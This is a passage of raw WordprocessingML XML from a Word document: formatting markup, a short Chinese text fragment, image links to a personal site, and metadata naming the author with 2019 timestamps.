          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就知道了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C355D5" w:rsidRPr="00D6179A" w:rsidRDefault="00C355D5"/>
    <w:sectPr w:rsidR="00C355D5" w:rsidRPr="00D61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33033"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6F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8C"/>
    <w:rsid w:val="00BD6048"/>
    <w:rsid w:val="00C355D5"/>
    <w:rsid w:val="00D6179A"/>
    <w:rsid w:val="00E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2AA33-541D-4875-B43A-BE8D5D6A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17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79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617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17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6179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617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6179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6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bendawang.site/images/592e158ef610c2492a000000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bendawang.site/images/586e317cb6a56d3762000002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bendawang.site/images/592e16ecf610c2492a00000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李睿</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李睿</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-26T03:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-26T03:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>